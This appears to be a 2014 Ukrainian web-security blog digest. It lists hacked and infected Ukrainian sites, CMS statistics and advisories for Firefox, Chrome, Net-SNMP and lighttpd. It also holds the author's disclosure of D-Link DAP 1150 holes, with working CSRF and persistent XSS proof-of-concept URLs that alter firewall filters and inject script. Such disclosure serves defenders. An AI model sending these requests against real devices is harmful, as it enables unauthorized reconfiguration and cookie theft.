Websecurity - Веб безпека

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.dei.gov.ua (хакером Dr.SHA6H) - 27.02.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.brusyliv-rda.gov.ua (хакером d3b~X) - 02.03.2014 - похаканий державний сайт, файл хакера все ще розміщений на сайті
• http://ivooptyka.com.ua (хакером SiR Abdou) - 06.03.2014, зараз сайт вже виправлений адмінами
• http://www.aneda.com.ua (хакером DaiLexX) - 04.03.2014, зараз сайт вже виправлений адмінами
• http://c-g.dn.ua (хакерами з Holy Lycans) - 28.03.2014, зараз сайт закритий хостером

Виявлені DoS уразливості в Net-SNMP. Ця утиліта існує у вигляді стаціонарної програми та у вигляді Perl і Python модулей.

Уразливі версії: Net-SNMP 5.7.

Декілька DoS-умов.

• Vulnerabilities in Net-SNMP (деталі)

Виходячи з моїх звітів про веб додатки на інфікованих сайтах в 1 півріччі та веб додатки на інфікованих сайтах в 2 півріччі, я підведу підсумки. Та наведу загальну статистику про веб додатки на інфікованих сайтах в 2013 році.

Як я зазначав в своїх звітах про хакерську активність в Уанеті, в першому півріччі було інфіковано 130 сайтів, а в другому півріччі було інфіковано 96 сайтів. Всього 226 сайтів за 2013 рік. І з них на 125 сайтах вдалося виявити движки.

На перевірених в минулому році сайтах використовуються наступні движки:

Joomla - 59
DataLife Engine - 13
WordPress - 13
Drupal - 4
uCoz - 4
CMS - 3
CNCat - 2
eM&IS-manager - 2
Elite-Board - 2
Gloowi Engine - 2
I-Soft Bizness - 2
ocStore - 2
UGCS CMS - 2
ArtDesign CMS - 1
Artefact St. CMS - 1
Bitrix Site Manager - 1
CMS Danneo - 1
CMS IT-Project - 1
CodeIgniter - 1
Global Vision CMS - 1
Kohana - 1
MODx - 1
osCommerce - 1
PHP-Fusion - 1
SmallNuke - 1
vBulletin - 1
Vivvo CMS - 1
WebAsyst Shop-Script - 1

Зазначу, що трійка лідерів серед веб додатків у першому й другому півріччі була незмінною. Й відповідно в підсумкових результатах за весь рік.

Тобто майже всі інфіковані сайти, з числа працюючих, використовували опенсорс веб додатки. Більшість з них публічні відкриті CMS, але деякі й комерційні відкриті веб програми.

25.03.2014

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 27.0, Firefox ESR 24.3, Thunderbird 24.3, Seamonkey 2.24, NSS.

Переповнення буфера, пошкодження пам’яті, витік інформації, підвищення привілеїв, обхід захисту, несанкціонований доступ, підміна запитів.

• Vulnerability in NSS (деталі)
• Mozilla Foundation Security Advisory 2014-15 (деталі)
• Mozilla Foundation Security Advisory 2014-16 (деталі)
• Mozilla Foundation Security Advisory 2014-17 (деталі)
• Mozilla Foundation Security Advisory 2014-18 (деталі)
• Mozilla Foundation Security Advisory 2014-19 (деталі)
• Mozilla Foundation Security Advisory 2014-20 (деталі)
• Mozilla Foundation Security Advisory 2014-21 (деталі)
• Mozilla Foundation Security Advisory 2014-22 (деталі)
• Mozilla Foundation Security Advisory 2014-23 (деталі)
• Mozilla Foundation Security Advisory 2014-24 (деталі)
• Mozilla Foundation Security Advisory 2014-25 (деталі)
• Mozilla Foundation Security Advisory 2014-26 (деталі)
• Mozilla Foundation Security Advisory 2014-27 (деталі)
• Mozilla Foundation Security Advisory 2014-28 (деталі)
• Mozilla Foundation Security Advisory 2014-29 (деталі)
• Mozilla Foundation Security Advisory 2014-30 (деталі)
• Mozilla Foundation Security Advisory 2014-31 (деталі)
• Mozilla Foundation Security Advisory 2014-32 (деталі)

10.04.2014

Нова інформація.

• Mozilla Firefox “BumpChunk” Object Processing Use-after-free (Pwn2Own) (деталі)
• Firefox for Android Profile Directory Derandomization and Data Exfiltration (деталі)

В 2011 році - початку 2012 року я оприлюднив численні уразливості в D-Link DAP 1150 (декілька десятків). Тоді я оприлюднив уразливості в адмінці в режими точки доступу, а зараз розповім про дірки в режимі роутера.

Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

CSRF (WASC-09):

В розділі Firewall в підрозділі IP-filters через CSRF можна додавати, редагувати та видаляти налаштування IP-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=88&res_pos=0

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Firewall / IP-filters.

Атака через функцію додавання в параметрі res_buf (в полях: Name, IP Addresses Source, Destination, Ports Source, Destination).

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22portd%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ipd%22:%22192.168.1.2/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22}&res_pos=-1

Атака через функцію редагування в параметрі res_buf (в полі Name, але не в інших полях).

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0

В презентації An Anatomy of a SQL Injection Attack, Imperva розповідає про анатомію SQL Injection атак: які бувають SQL ін’єкції, наскільки вони поширені, як проводяться атаки на SQLi уразливості та як їм протидіяти.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://kalodyx.pp.ua - інфекція була виявлена 18.01.2014. Зараз сайт входить до переліку підозрілих.
• http://expert.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://myinfos.com.ua - інфекція була виявлена 09.04.2014. Зараз сайт входить до переліку підозрілих.
• http://femina.com.ua - інфекція була виявлена 18.03.2014. Зараз сайт не входить до переліку підозрілих.
• http://tradeup.com.ua - інфекція була виявлена 05.04.2014. Зараз сайт не входить до переліку підозрілих.

Виявлені численні уразливості безпеки в Google Chrome та Chromium.

Уразливі продукти: Google Chrome 33.0, Chromium 33.0.

Пошкодження пам’яті, витоки інформації, проблеми з перевіркою сертифіката, обхід обмежень, міжсайтовий скриптінг, зворотний шлях у каталогах.

• Google Chrome “Clipboard::WriteData()” Function Sandbox Escape (Pwn2Own) (деталі)
• Google Chrome Blink “locationAttributeSetter” Use-after-free (Pwn2Own) (деталі)
• chromium-browser security update (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Blogfolio, Folo та Easy Career Openings. Для котрих з’явилися експлоіти. Blogfolio - це тема движка, Folo - це тема движка, Easy Career Openings - це плагін для створення списку вакансій.

• WordPress Blogfolio Shell Upload (деталі)
• WordPress Folo Theme Cross Site Scripting (деталі)
• WordPress Easy Career Openings SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Виявлені численні уразливості безпеки в lighttpd.

Уразливі версії: lighttpd 1.4.

SQL-ін’єкція, зворотний шлях у каталогах.

• lighttpd security update (деталі)